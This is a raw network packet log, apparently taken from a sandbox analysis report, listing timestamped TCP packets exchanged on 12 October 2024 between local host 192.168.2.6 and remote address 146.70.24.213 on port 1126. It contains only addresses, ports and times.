Oct 12, 2024 20:30:04.392582893 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.392618895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392652988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392664909 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.392684937 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392719030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392755032 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.392946005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.392978907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.393001080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.393009901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.394691944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.394735098 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.394742966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.394792080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.394833088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.394839048 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.394867897 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.394876957 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.394898891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.394932032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.394963026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.394963980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.394995928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395008087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.395028114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395059109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395101070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.395243883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395284891 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.395293951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395334959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395417929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395452976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395457983 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.395648956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395699978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395700932 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.395731926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395742893 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.395764112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395796061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395807028 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.395828962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395859957 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395883083 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.395893097 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395924091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395957947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.395983934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.396578074 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.397283077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397335052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397367954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397403002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.397440910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397474051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397507906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397516966 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.397537947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397572041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397583008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.397607088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397649050 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.397737980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397789955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397821903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397852898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397885084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397916079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397949934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.397979975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398013115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398046017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398080111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398108959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398114920 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.398186922 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.398538113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398588896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398602009 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.398623943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398655891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398669958 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.398689985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.398789883 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.399013042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399064064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399095058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399127960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399158955 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.399166107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399175882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.399218082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399245977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399302006 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.399444103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399494886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399525881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399539948 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.399566889 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.399583101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399616003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399660110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.399666071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399698019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399730921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399741888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.399763107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399796009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.399847984 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.400064945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.400099039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.400130987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.400158882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.400186062 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.400264978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.400296926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.400327921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.400374889 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.419564962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485011101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485066891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485100031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485142946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485150099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485203028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485207081 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485254049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485302925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485336065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485364914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485367060 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485397100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485397100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485429049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485441923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485460043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485491991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485523939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485546112 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485557079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485568047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485590935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485626936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485658884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485672951 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485692024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485697985 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485743046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485775948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485809088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485821009 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.485841036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.485865116 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.487366915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487413883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487462997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487476110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.487497091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487504005 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.487529993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487584114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487637997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487637997 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.487670898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487719059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487751007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487760067 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.487760067 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.487798929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487832069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487843990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.487864017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487896919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487909079 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.487929106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487962961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.487970114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.487994909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488029957 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488064051 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488069057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488112926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488118887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488151073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488184929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488215923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488219976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488249063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488276005 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488280058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488313913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488346100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488358974 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488378048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488409042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488420010 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488441944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488450050 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488473892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488507032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488518000 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488538980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488573074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488576889 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488605976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488640070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488645077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488672018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488704920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488737106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488765001 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488768101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488800049 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488801003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488833904 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488867044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488878965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.488899946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.488950014 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.489799023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.489851952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.489861012 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.489901066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.489933014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.489962101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.489980936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490012884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490061998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490072012 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.490093946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490127087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490139961 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.490166903 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.490176916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490211010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490242958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490266085 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.490274906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490305901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490333080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.490339041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490371943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490403891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490410089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.490436077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490468025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490502119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490502119 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.490502119 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.490536928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490566015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.490608931 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.491568089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491621971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491672993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491689920 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.491707087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491717100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.491739035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491787910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491821051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491853952 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.491853952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491872072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.491887093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491940975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491974115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.491985083 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492022991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492072105 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492074013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492105961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492129087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492157936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492208004 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492233038 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492259026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492286921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492317915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492330074 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492351055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492398977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492412090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492432117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492444038 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492466927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492500067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492511034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492531061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492566109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492573023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492597103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492629051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492660999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492672920 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492696047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492722988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.492744923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.492763996 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.577811003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.577915907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.577953100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.577984095 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.577987909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578021049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578056097 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578062057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.578089952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578124046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578124046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.578157902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578186035 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.578192949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578226089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578252077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.578258991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578291893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578325033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578340054 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.578360081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578377008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:04.578396082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578428984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:04.578459978 CEST	49710	1126	192.168.2.6	146.70.24.213
